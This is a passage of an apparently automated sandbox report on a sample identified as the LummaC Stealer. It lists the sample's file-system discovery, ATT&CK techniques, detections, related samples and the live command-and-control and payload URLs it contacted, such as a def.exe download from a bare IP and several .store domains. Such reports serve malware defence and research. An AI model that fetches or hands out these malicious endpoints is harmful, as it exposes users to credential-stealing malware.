          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\WHZAGPPPLAJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUKNXICOZTJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ERWQDBYZVWJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\WHZAGPPPLAJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUKNXICOZTJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\WHZAGPPPLAJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ERWQDBYZVWJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7160, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected LummaC Stealer
          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7160, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Windows Management Instrumentation          		1
          DLL Side-Loading          		2
          Process Injection          		1
          Masquerading          		2
          OS Credential Dumping          		761
          Security Software Discovery          		Remote Services1
          Archive Collected Data          		11
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts2
          Command and Scripting Interpreter          		Boot or Logon Initialization Scripts1
          DLL Side-Loading          		41
          Disable or Modify Tools          		LSASS Memory2
          Process Discovery          		Remote Desktop Protocol31
          Data from Local System          		11
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          PowerShell          		Logon Script (Windows)2
          Bypass User Account Control          		361
          Virtualization/Sandbox Evasion          		Security Account Manager361
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
          Process Injection          		NTDS1
          File and Directory Discovery          		Distributed Component Object ModelInput Capture124
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets223
          System Information Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
          Obfuscated Files or Information          		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
          Software Packing          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
          Bypass User Account Control          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          file.exe100%AviraTR/Crypt.TPM.Gen
          file.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exe100%Joe Sandbox ML

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          crisiwarny.store14%VirustotalBrowse
          presticitpo.store1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
          https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
          https://duckduckgo.com/ac/?q=0%URL Reputationsafe
          http://crl.microsoft0%URL Reputationsafe
          http://crl.microsoft0%URL Reputationsafe
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
          http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
          https://www.ecosia.org/newtab/0%URL Reputationsafe
          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
          https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
          https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
          http://x1.c.lencr.org/00%URL Reputationsafe
          http://x1.i.lencr.org/00%URL Reputationsafe
          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
          http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
          https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u0%URL Reputationsafe
          https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg0%URL Reputationsafe
          https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          crisiwarny.store
          		104.21.95.91
          		truetrueunknown
          presticitpo.store
          		unknown
          		unknowntrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          presticitpo.storetrue
            		unknown
            scriptyprefej.storetrue
              		unknown
              https://crisiwarny.store/apitrue
                		unknown
                necklacedmny.storetrue
                  		unknown
                  fadehairucw.storetrue
                    		unknown
                    navygenerayk.storetrue
                      		unknown
                      founpiuer.storetrue
                        		unknown
                        thumbystriw.storetrue
                          		unknown
                          crisiwarny.storetrue
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0file.exe, 00000006.00000003.1354818335.0000000001326000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://duckduckgo.com/chrome_newtabfile.exe, 00000006.00000003.1320523200.0000000005D49000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320592816.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320743875.0000000005D47000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://duckduckgo.com/ac/?q=file.exe, 00000006.00000003.1320523200.0000000005D49000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320592816.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320743875.0000000005D47000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000006.00000003.1320523200.0000000005D49000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320592816.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320743875.0000000005D47000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                http://crl.microsoftfile.exe, 00000006.00000003.1507177296.00000000012F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000002.1509488766.00000000012F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://185.215.113.16/off/def.exe8Tfile.exe, 00000006.00000003.1507177296.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000002.1509561682.000000000130E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://crisiwarny.store/95hEL9zzrqbevk/6file.exe, 00000006.00000002.1512219252.0000000005D00000.00000004.00000800.00020000.00000000.sdmptrue
                                    		unknown
                                    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.file.exe, 00000006.00000003.1354818335.0000000001326000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000006.00000003.1320523200.0000000005D49000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320592816.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320743875.0000000005D47000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000006.00000003.1353469491.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000006.00000003.1320523200.0000000005D49000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320592816.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320743875.0000000005D47000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://ocsp.rootca1.amazontrust.com0:file.exe, 00000006.00000003.1353469491.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://www.ecosia.org/newtab/file.exe, 00000006.00000003.1320523200.0000000005D49000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320592816.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320743875.0000000005D47000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000006.00000003.1354559370.0000000006029000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://185.215.113.16/sOcfile.exe, 00000006.00000002.1509191410.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000003.1507177296.000000000129E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://crisiwarny.store/apiVfile.exe, 00000006.00000003.1507177296.00000000012FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000002.1509488766.00000000012FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000003.1507466108.00000000012FA000.00000004.00000020.00020000.00000000.sdmptrue
                                            		unknown
                                            https://ac.ecosia.org/autocomplete?q=file.exe, 00000006.00000003.1320523200.0000000005D49000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320592816.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320743875.0000000005D47000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://185.215.113.16/file.exe, 00000006.00000002.1509191410.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000003.1507177296.000000000129E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://185.215.113.16/xOXfile.exe, 00000006.00000002.1509191410.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000003.1507177296.000000000129E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000006.00000003.1354818335.0000000001326000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://x1.c.lencr.org/0file.exe, 00000006.00000003.1353469491.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://x1.i.lencr.org/0file.exe, 00000006.00000003.1353469491.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000006.00000003.1320523200.0000000005D49000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320592816.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320743875.0000000005D47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000006.00000003.1353469491.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&ufile.exe, 00000006.00000003.1354818335.0000000001326000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9efile.exe, 00000006.00000003.1354818335.0000000001326000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgfile.exe, 00000006.00000003.1354818335.0000000001326000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://crisiwarny.store/pfile.exe, 00000006.00000003.1340486547.0000000005D03000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1336025053.0000000005D02000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1342141043.0000000005D04000.00000004.00000800.00020000.00000000.sdmptrue
                                                    		unknown
                                                    http://185.215.113.16/off/def.exefile.exe, 00000006.00000003.1507177296.00000000012FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000002.1509038620.0000000000FFA000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000006.00000003.1507177296.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000002.1509561682.000000000130E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000003.1507177296.0000000001291000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000002.1509488766.00000000012FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000002.1509191410.0000000001291000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000003.1507466108.00000000012FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://185.215.113.16/off/def.exe.file.exe, 00000006.00000003.1507177296.00000000012FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000002.1509488766.00000000012FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000003.1507466108.00000000012FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://crisiwarny.store/file.exe, 00000006.00000002.1512219252.0000000005D00000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1319947232.000000000130C000.00000004.00000020.00020000.00000000.sdmptrue
                                                          		unknown
                                                          https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000006.00000003.1354559370.0000000006029000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000006.00000003.1320523200.0000000005D49000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320592816.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000003.1320743875.0000000005D47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://crisiwarny.store/sfile.exe, 00000006.00000002.1512219252.0000000005D00000.00000004.00000800.00020000.00000000.sdmptrue
                                                            		unknown
                                                            https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&ctafile.exe, 00000006.00000003.1354818335.0000000001326000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              104.21.95.91
                                                              		crisiwarny.storeUnited States
                                                              		13335CLOUDFLARENETUStrue
                                                              185.215.113.16
                                                              		unknownPortugal
                                                              		206894WHOLESALECONNECTIONSNLfalse

                                                              General Information

                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1543096
                                                              Start date and time:2024-10-27 08:51:09 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 6m 25s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:15
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:file.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.evad.winEXE@3/2@2/2
                                                              EGA Information:
                                                              • Successful, ratio: 50%
                                                              HCA Information:Failed
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                              • Execution Graph export aborted for target file.exe, PID 7160 because there are no executed function
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              03:52:09API Interceptor10x Sleep call for process: file.exe modified
                                                              08:51:59Task SchedulerRun new task: {E829A9CD-BB8E-4565-A567-28E521CD8441} path: .

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              104.21.95.91file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                              CheatInjector.exeGet hashmaliciousLummaCBrowse
                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                  185.215.113.16file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 185.215.113.16/off/def.exe
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 185.215.113.16/off/def.exe
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 185.215.113.16/off/def.exe
                                                                                  S92Ayq3U9A.exeGet hashmaliciousLummaCBrowse
                                                                                  • 185.215.113.16/off/def.exe
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 185.215.113.16/off/def.exe
                                                                                  D18h1ni3ZU.exeGet hashmaliciousLummaCBrowse
                                                                                  • 185.215.113.16/off/def.exe
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 185.215.113.16/off/def.exe
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 185.215.113.16/off/def.exe
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 185.215.113.16/off/def.exe
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 185.215.113.16/off/def.exe

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  crisiwarny.storefile.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.170.64
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.170.64
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.170.64
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.170.64
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.170.64
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.170.64
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.170.64
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.170.64
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.170.64
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.170.64

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  CLOUDFLARENETUSsh4.elfGet hashmaliciousMiraiBrowse
                                                                                  • 1.3.103.28
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.170.64
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.170.64
                                                                                  https://duy38.r.ag.d.sendibm3.com/mk/cl/f/sh/1t6Af4OiGsF30wT9TF4ckLf3fAzx5z/28D7HenRXzOUGet hashmaliciousLummaCBrowse
                                                                                  • 172.64.150.216
                                                                                  Flech.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.96.3
                                                                                  8itMk7loon.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.96.3
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.170.64
                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                  • 188.114.96.3
                                                                                  S92Ayq3U9A.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.96.3
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.170.64
                                                                                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                                                                  • 185.215.113.206
                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                  • 185.215.113.206
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 185.215.113.16
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 185.215.113.16
                                                                                  file.exeGet hashmaliciousStealcBrowse
                                                                                  • 185.215.113.206
                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                  • 185.215.113.206
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 185.215.113.16
                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                  • 185.215.113.17
                                                                                  S92Ayq3U9A.exeGet hashmaliciousLummaCBrowse
                                                                                  • 185.215.113.16
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 185.215.113.16

                                                                                  JA3 Fingerprints

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.95.91
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.95.91
                                                                                  https://duy38.r.ag.d.sendibm3.com/mk/cl/f/sh/1t6Af4OiGsF30wT9TF4ckLf3fAzx5z/28D7HenRXzOUGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.95.91
                                                                                  order confirmation.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                  • 104.21.95.91
                                                                                  Flech.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.95.91
                                                                                  8itMk7loon.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.95.91
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.95.91
                                                                                  S92Ayq3U9A.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.95.91
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.95.91
                                                                                  BmWYNo1MMZ.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.95.91

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AU963ROPSBOYUMXP3FF.exe.log

                                                                                  Download File
                                                                                  Process:C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exe
                                                                                  File Type:CSV text
                                                                                  Category:dropped
                                                                                  Size (bytes):226
                                                                                  Entropy (8bit):5.360398796477698
                                                                                  Encrypted:false
